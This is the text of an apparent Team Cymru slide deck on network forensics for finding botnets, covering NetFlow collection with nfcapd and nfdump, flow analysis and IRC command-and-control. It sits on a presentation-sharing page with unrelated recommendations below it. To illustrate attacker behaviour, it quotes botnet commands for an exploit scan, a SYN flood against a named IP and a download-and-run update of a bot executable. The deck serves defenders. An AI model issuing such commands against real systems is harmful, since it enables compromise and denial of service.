team cymru cymru team
play

Team Cymru Cymru Team Network Forensics Ryan Connolly, - PowerPoint PPT Presentation

Jan 18, 2023 •547 likes •997 views

Team Cymru Cymru Team Network Forensics Ryan Connolly, ryan@cymru.com <http://www.cymru.com> Network Forensics what does it mean? network forensics is the analysis of network events in order to discover the source of problem

  1. Team Cymru Cymru Team Network Forensics Ryan Connolly, ryan@cymru.com <http://www.cymru.com>

  2. Network Forensics …what does it mean? • network forensics is the analysis of network events in order to discover the source of problem incidents.

  3. What sort of “problem incidents?” aka “network badness”? lots of things - for this discussion, let's talk primarily about botnets

  4. Why botnets? • Botnets are currently the most significant force behind many miscreant activities that make our lives as network operators -- and as citizens of the internet -- more difficult. • Botnets allow criminals to make money - DDoS, warez, phishing, financial crimes, etc Bottom line: It's all about the money ... but that's another talk.

  5. We’ve seen BotNets with over 28,000,000 hosts! Attacker Command & Control Servers Compromised ‘drones’ Types: agobot, forbot, gtbot, phatbot, rbot, rxbot, sdbot, phatbot, storm, etc, etc.

  6. Creation of a botnet • Scan & sploit – it still works – many, many vulnerabilities, and more every day – Scanning entire /8 takes approximately 32 hours. – Bad neighborhoods most popular - cable & DSL ranges – home users are less protected… how about that VPN connection? • Malware attached to emails (i.e. socially-engineered spreading) • Files transferred via Instant Messaging programs • Flaws in Internet Explorer, Firefox, and many, many others • etc, etc, etc …attacks are against all platforms (*NIX, Windows XP/2000/98/etc, Mac OS), in many ways… no one is safe!

  7. Botnet scan & sploit

  8. Creation of a botnet • “phone home," usually using DNS, sometimes using a hard-coded IP • Bots join a channel on the IRC server and wait to accept commands • HTTP-based bots increasing – harder to detect • P2P bots: Phatbot, Superbot, Storm • Increasingly encrypted & obfuscated connections to C&C • Distributed C&Cs – need for coordinated takedown

  9. Botnet ops while (1) { pain(); } • stealing access credentials -- especially to financial sites (keylogging) • phishing (running a HTTP server) • Spread further .advscan lsass 100 10 0 -r –s Attempt to exploit machines with the lsass vulnerability. Scan with → 100 concurrent threads and delay of 10 seconds randomly (-r) and silently (-s) for an unlimited time (0). • DDoS .ddos.syn 64.233.187.123 21 300 ddos 64.233.187.123 on port 21 for 300 seconds → • malware hosting & distribution (running a FTP/HTTP server) • open proxies & bounces • spam (send directly or use as a mail relay) • adware

  10. Preventative measures Ah, but how to ease the pain? (1) Social factor - how do you get users to stop clicking on bad attachments & protect against social engineering attacks? (2) Administrative factor - how do you get admins to install & stay up-to-date with necessary patches? (3) Engineering factor - how do you get software developers to write secure code? (4) Criminal factor – how do you remove the motivation to commit on-line crime? When you know the answers to these, PLEASE, let me know!

  11. So, for now, we need to make the bad guy's life more difficult. Objective: deter miscreants from committing online crime.

  12. Botnets - How do we find them? Network Forensics (1) Watch flows (2) Watch DNS (3) Effectively use Darknets (4) Sniffing (5) Sandboxing (6) Malware analysis

  13. Collecting flows Web server 64.233.167.99 Internet uplink 2007-01-30 06:53:53.370 04.545 TCP 192.168.30.10:3575 -> 64.233.167.99:80 .AP.SF 0 72 5600 1 Internal network Client Flow collector 192.168.30.10

  14. Collecting flows – enabling collection A generic Cisco example: interface fastethernet 0/0 ip route-cache flow Set to netflow version 5 and set timeout: ip flow-export <ip> <port> ip flow-export version 5 Break-up long flows into 5 minute segments (should be less than your file rotation time): ip flow-cache timeout active 5

  15. Collecting flows – enabling collection nfcapd – Flow collector – Listens for flows on a given port and stores the data into files that are rotated a pre-set number of minutes – One nfcapd per flow stream – Example: nfcapd –w –D –l /var/log/flows/router1 –p 23456 nfcapd –w –D –l /var/log/flows/router2 –p 23457 -w: sync file rotation with next 5 minute interval -D: fork to background -l: location of log file

  16. Collecting flows – enabling collection • May wish to use nfdump on the resulting files to insert flow records into a database • Stager: system for aggregating and presenting network statistics. – Collects & stores network info (netflow, SNMP, MPing) in a database – Provides a web front-end

  17. Watching flows Total network awareness Packets Flows Date TCP flags Source IP:Port Duration 2005-08-30 06:53:53.370 63.545 TCP 113.138.32.152:25 -> 222.33.70.124:3575 .AP.SF 0 62 3512 1 2005-08-30 06:53:53.370 63.545 TCP 222.33.70.124:3575 -> 113.138.32.152:25 .AP.SF 0 58 3300 1 Destination IP:Port Protocol Bytes Start time Type of Service

  18. Watching flows nfdump Packets Bytes pps bps Bpp Flows Sort flows by total number of bytes 1.4 M 2.0 G 2023 5.6 M 1498 1 # nfdump -r nfcapd.200508300700 -o extended -s srcip -s ip/flows -s dstport/pps/packets/bytes -s record/bytes Top 10 flows ordered by bytes: Date flow Prot Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes pps bps Bpp Flows 2005-08-30 TCP 126.52.54.27:47303 -> 42.90.25.218:435 ...... 0 1.4 M 2.0 G 2023 5.6 M 1498 1 2005-08-30 TCP 198.100.18.123:54945 -> 126.52.57.13:119 ...... 0 567732 795.1 M 627 2.5 M 1468 1 2005-08-30 TCP 126.52.57.13:45633 -> 91.127.227.206:119 ...... 0 321148 456.5 M 355 4.0 M 1490 1 2005-08-30 TCP 126.52.57.13:45598 -> 91.127.227.206:119 ...... 0 320710 455.9 M 354 4.0 M 1490 1 2005-08-30 TCP 126.52.57.13:45629 -> 91.127.227.206:119 ...... 0 317764 451.5 M 351 4.0 M 1489 1 2005-08-30 TCP 126.52.57.13:45634 -> 91.127.227.206:119 ...... 0 317611 451.2 M 351 4.0 M 1489 1 2005-08-30 TCP 126.52.57.13:45675 -> 91.127.227.206:119 ...... 0 317319 451.0 M 350 4.0 M 1490 1 2005-08-30 TCP 126.52.57.13:45619 -> 91.127.227.206:119 ...... 0 314199 446.5 M 347 3.9 M 1490 1 2005-08-30 TCP 126.52.54.35:59898 -> 132.94.115.59:2466 ...... 0 254717 362.4 M 322 3.7 M 1491 1 2005-08-30 TCP 126.52.54.35:59773 -> 55.107.224.187:11709 ...... 0 272710 348.5 M 301 3.1 M 1340 1 …the possibilities are endless…

  19. Watching flows nfdump # nfdump –r nfcapd_file See scanning on your network… –A src,dstport –c 10 ‘src ip 192.168.2.12’ Date flow start Prot Src IP Addr:Port Dst IP Addr:Port Packets Bytes 2006-12-02 14:02:12 TCP 192.168.2.12:47303 -> 192.168.2.13:445 1 60 B 2006-12-02 14:02:12 TCP 192.168.2.12:47304 -> 192.168.2.14:445 1 60 B 2006-12-02 14:02:12 TCP 192.168.2.12:47305 -> 192.168.2.15:445 1 60 B 2006-12-02 14:02:12 TCP 192.168.2.12:47306 -> 192.168.2.16:445 1 60 B 2006-12-02 14:02:12 TCP 192.168.2.12:47307 -> 192.168.2.17:445 1 60 B 2006-12-02 14:02:13 TCP 192.168.2.12:47308 -> 192.168.2.18:445 1 60 B 2006-12-02 14:02:13 TCP 192.168.2.12:47309 -> 192.168.2.19:445 1 60 B 2006-12-02 14:02:13 TCP 192.168.2.12:47310 -> 192.168.2.20:445 1 60 B 2006-12-02 14:02:13 TCP 192.168.2.12:47311 -> 192.168.2.21:445 1 60 B 2006-12-02 14:02:13 TCP 192.168.2.12:47312 -> 192.168.2.22:445 1 60 B

  20. Watching flows nfsen – a graphical interface! http://nfsen.sourceforge.net

  21. Watching flows nfsen – a graphical interface! http://nfsen.sourceforge.net

  22. Watching flows Identify DDoS sources DDoS sources are very likely compromised devices (assuming they aren’t spoofed).

  23. Watching flows Total network awareness By examining flows, you’ve noticed that 192.168.100.10 has scanned 100 hosts in your network on UDP port 1434, with a 404-byte packet (characteristic of slammer). Looking at flows to/from 192.168.100.10, you see connections to your company mail server, news sites, google, etc, and to the following: Date flow start Prot Src IP Addr:Port Dst IP Addr:Port Packets Bytes 2006-12-02 14:02:12 TCP 192.168.100.10:33372 -> 80.240.192.81:6667 1 60 B Using the Cymru whois IP-to-BGP server, you see a connection to Swift Global, an ISP in Kenya.: # whois -h whois.cymru.com 80.240.192.81 AS | IP | AS Name 21280 | 80.240.192.81 | SWIFTGLOBAL-AS Logging-on to the IRC server, you identify channels with topics set to things like, “.http.update http://<server>/~mugenxu/rBot.exe c:\windows\msy32awds.exe 1". Users within the channels have cryptic nicks, such as “[XP]-39381.”

  24. Collecting flows – Stager

  25. Collecting flows – Stager

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Team Cymru Cymru Team Penetration Testing Ryan Connolly, ryan@cymru.com

Team Cymru Cymru Team Penetration Testing Ryan Connolly, ryan@cymru.com

Team Cymru Cymru Team Penetration Testing Ryan Connolly, ryan@cymru.com &lt;http://www.cymru.com&gt; Penetration Testing Agenda Pentesting Basics Pentesting Defined Vulnerability Scanning vs. Penetration testing Pentesting

879 views • 83 slides
Dewis Cymru - the national context Dewis Cymru forms part of the local government response to

Dewis Cymru - the national context Dewis Cymru forms part of the local government response to

09/01/18 Dewis Cymru Dewis Cymru Scrutiny Performance Panel Adult Services 16 January 2018 Presentation on DEWIS Cymru Simon Jones Swansea Council Dewis Cymru - the national context Dewis Cymru forms part of the local government

258 views • 8 slides
Hub Cymru Africa Presentation 2018 fit for a purpose The grant from Hub Cymru was for 4,000

Hub Cymru Africa Presentation 2018 fit for a purpose The grant from Hub Cymru was for 4,000

fit for a purpose Hub Cymru Africa Presentation 2018 fit for a purpose The grant from Hub Cymru was for 4,000 2,100 was spent in the first year on the Welsh Three Peaks and November Challenge. Year two - 1,900 for a mail shot to over

464 views • 13 slides
13 Things to Consider Before DNSSEC John Kristoff jtk@cymru.com FIRST 2010 John Kristoff

13 Things to Consider Before DNSSEC John Kristoff jtk@cymru.com FIRST 2010 John Kristoff

13 Things to Consider Before DNSSEC John Kristoff jtk@cymru.com FIRST 2010 John Kristoff Team Cymru 1 Where is the DNSSEC? We make no endorsement of DNSSEC here We offer no repudiation of DNSSEC here The considerations herein

543 views • 31 slides
Wales Circular Economy Fund Deliver Delivered b ed by WRAP Cymru WRAP Cymru on behalf on

Wales Circular Economy Fund Deliver Delivered b ed by WRAP Cymru WRAP Cymru on behalf on

Wales Circular Economy Fund Deliver Delivered b ed by WRAP Cymru WRAP Cymru on behalf on behalf of the of the We Welsh G Government May 2019 May 2019 Cr Croeso oeso Bettina Gilbert Bettina Gilbert Pr Progr ogramme mme Manager

608 views • 58 slides
Neil Ayling President of ADSS Cymru Leading for the future A whole systems approach We are what

Neil Ayling President of ADSS Cymru Leading for the future A whole systems approach We are what

ADSS Cymru &amp; Social Work Scotland Presidents Chaired by Cathy Kerr Neil Ayling President of ADSS Cymru Leading for the future A whole systems approach We are what we repeatedly do. Excellence , then is not an Act , but a habit. Aristotle

468 views • 22 slides
Who, What, Where and How An Insider's View to Participating in the Security Community John

Who, What, Where and How An Insider's View to Participating in the Security Community John

Who, What, Where and How An Insider's View to Participating in the Security Community John Kristoff jtk@cymru.com FIRST 2012 John Kristoff Team Cymru 1 Editorial Note I can't but help reflect on the security community history, present

646 views • 27 slides
Cefnogi teuluoedd Cymru Supporting Wales Families Karen Cornish, Dirprwy Gyfarwyddwr / Deputy

Cefnogi teuluoedd Cymru Supporting Wales Families Karen Cornish, Dirprwy Gyfarwyddwr / Deputy

Cefnogi teuluoedd Cymru Supporting Wales Families Karen Cornish, Dirprwy Gyfarwyddwr / Deputy Director, yr Is-adran Plant a Theuluoedd / Children &amp; Families Division Llywodraeth Cymru / Welsh Government #BilPlantCymru Welsh Government

421 views • 10 slides
UNICEFs Rights Respecting School Award SARAH HOOKE Education Officer, Cymru UNICEF UK

UNICEFs Rights Respecting School Award SARAH HOOKE Education Officer, Cymru UNICEF UK

1 Friday 5 Friday 5 th th March 2010 March 2010 UNICEFs Rights Respecting School Award SARAH HOOKE Education Officer, Cymru UNICEF UK education team education team 2 THE VISION BEHIND THE RIGHTS RESPECTING THE VISION BEHIND THE

329 views • 12 slides
Newydd Hydref 2017 New Inspection Arrangements Autumn 2017 Liz Counsell HMI estyn.llyw.cymru

Newydd Hydref 2017 New Inspection Arrangements Autumn 2017 Liz Counsell HMI estyn.llyw.cymru

Trefniadau Arolygu Newydd Hydref 2017 New Inspection Arrangements Autumn 2017 Liz Counsell HMI estyn.llyw.cymru estyn.gov.wales Egwyddorion arwain Guiding principles estyn.llyw.cymru estyn.gov.wales Yr egwyddorion ar meddylfryd

768 views • 28 slides
WALES MOVING TOWARDS A CONTINUING BAN ON GM CROP CULTIVATION WALES Cymru THE LAND OF MY

WALES MOVING TOWARDS A CONTINUING BAN ON GM CROP CULTIVATION WALES Cymru THE LAND OF MY

WALES MOVING TOWARDS A CONTINUING BAN ON GM CROP CULTIVATION WALES Cymru THE LAND OF MY FATHERS Hen Wlad Fy Nhadau WELSH AGRICULTURE The question the people of Wales have had to answer is: 1.6 million hectares (around 77% of Wales' total

538 views • 16 slides
Public spending in Wales The End of Austerity and Beginning of Brexit: What are the implications

Public spending in Wales The End of Austerity and Beginning of Brexit: What are the implications

Public spending in Wales The End of Austerity and Beginning of Brexit: What are the implications for Wales? Wales Centre for Public Policy Event Caerdydd / Cardiff 05/02/2020 Guto Ifan DadansoddiCyllid Cymru, Canolfan Llywodraethiant Cymru,

398 views • 36 slides
Gofal Cymdeithasol (Cymru) 2016 Regulation and Inspection of Social Care (Wales) Act 2016 Y

Gofal Cymdeithasol (Cymru) 2016 Regulation and Inspection of Social Care (Wales) Act 2016 Y

Deddf Rheoleiddio ac Arolygu Gofal Cymdeithasol (Cymru) 2016 Regulation and Inspection of Social Care (Wales) Act 2016 Y fframwaith deddfwriaethol The legislative framework Egwyddorion a beth mae hyn yn ei olygu ich gwasanaeth Principles and

234 views • 20 slides
Contact a Family Cymru Presentation 2016 Background to Families visiting the Cinema Some of the

Contact a Family Cymru Presentation 2016 Background to Families visiting the Cinema Some of the

Contact a Family Cymru Presentation 2016 Background to Families visiting the Cinema Some of the daily general issues for parents Family life appointments, medical interventions, feeding, washing, sleep, family breakdown etc

120 views • 9 slides
History and Community Marco Gil-Cervantes Chief Executive marco@promo.cymru 07970 662341

History and Community Marco Gil-Cervantes Chief Executive marco@promo.cymru 07970 662341

History and Community Marco Gil-Cervantes Chief Executive marco@promo.cymru 07970 662341 @marcogilcer To work with local communities and beyond, to create a centre of excellence to be proud of, in which people can participate , learn,

384 views • 17 slides
WRAP Cymru 22 nd October 2015 Paul Crewe Head of Sustainability Our Values make us different:

WRAP Cymru 22 nd October 2015 Paul Crewe Head of Sustainability Our Values make us different:

WRAP Cymru 22 nd October 2015 Paul Crewe Head of Sustainability Our Values make us different: Sainsburys 20x20 Sustainability Plan carbon, water, waste &amp; packaging Sainsburys environment timeline : 1993 1996 1999 2001 2003 2005

308 views • 28 slides
Evaluation of Intrusion Detection Systems in Clouds Thibaut Probst , E. Alata, M. Ka aniche, V.

Evaluation of Intrusion Detection Systems in Clouds Thibaut Probst , E. Alata, M. Ka aniche, V.

Problem statement Methodology Testbed and Experimental Results Conclusion Evaluation of Intrusion Detection Systems in Clouds Thibaut Probst , E. Alata, M. Ka aniche, V. Nicomette LAAS-CNRS - Dependable Computing and Fault Tolerance (TSF)

719 views • 22 slides
Find Joy in the Journey Guarding Yourself Against 5 Joy Robbers Be joyful always; pray

Find Joy in the Journey Guarding Yourself Against 5 Joy Robbers Be joyful always; pray

Find Joy in the Journey Guarding Yourself Against 5 Joy Robbers Be joyful always; pray continually; give thanks in all circumstances, for this is Gods will for you in Christ Jesus. I Thessalonians 5:16-18 For the kingdom of God is

332 views • 19 slides
15 20 years ago Internet starting to reach a wider audience most people did not

15 20 years ago Internet starting to reach a wider audience most people did not

10/19/2010 15 20 years ago Internet starting to reach a wider audience most people did not have emails Mitigating Cyber Attacks computer security an afterthought The typical hacker, often portrayed as teenager,

588 views • 25 slides
IPv6 Intrusion Detection Research Project Carsten Rossenhvel, EANTC AG Sven Schindler,

IPv6 Intrusion Detection Research Project Carsten Rossenhvel, EANTC AG Sven Schindler,

IPv6 Intrusion Detection Research Project Carsten Rossenhvel, EANTC AG Sven Schindler, Universitt Potsdam Co-Financed By: Project Goals Independently assess the true, current risks of IPv6 attacks Develop intrusion detection tools for

447 views • 17 slides
CC - Elisa Azzali CC - Tim Morgan CC - Quinn Dombrowski Public domain - Theodore C. Marceau CC

CC - Elisa Azzali CC - Tim Morgan CC - Quinn Dombrowski Public domain - Theodore C. Marceau CC

THE cloud data feed CC - Elisa Azzali CC - Tim Morgan CC - Quinn Dombrowski Public domain - Theodore C. Marceau CC - Erik Christensen Damn-fast and effective malware info sharing with MISP by Christophe Vandeplas http://misp-project.org

692 views • 47 slides
Prevalence of Malicious DNS and Proposed Solutions Christopher Davis and Zachary Hanif Sunday,

Prevalence of Malicious DNS and Proposed Solutions Christopher Davis and Zachary Hanif Sunday,

Prevalence of Malicious DNS and Proposed Solutions Christopher Davis and Zachary Hanif Sunday, March 11, 12 Introduction Chris Davis Emerging Threats &amp; University of Toronto Fellow IPTrust, DefIntel, Damballa... Mariposa, Conficker,

158 views • 15 slides
Prepare, Present, Assess Presented By: Charlie Rizzuto 2016 Nassau Zone Secondary PE

Prepare, Present, Assess Presented By: Charlie Rizzuto 2016 Nassau Zone Secondary PE

Prepare, Present, Assess Presented By: Charlie Rizzuto 2016 Nassau Zone Secondary PE Teacher of the Year 2017 NYS Health Education Amazing Person of the Year IGOR ELEVANCE ELATIONSHIPS Snack Time What was most memorable? Why are

863 views • 85 slides
River Runners Citizen Science Training Workshop with support and funding from New Hampshire

River Runners Citizen Science Training Workshop with support and funding from New Hampshire

River Runners Citizen Science Training Workshop with support and funding from New Hampshire Rivers Council members like you Exotic Species EXOTIC and INVASIVE: A species that is not native and is introduced to an area either purposely

1.01k views • 71 slides

More recommend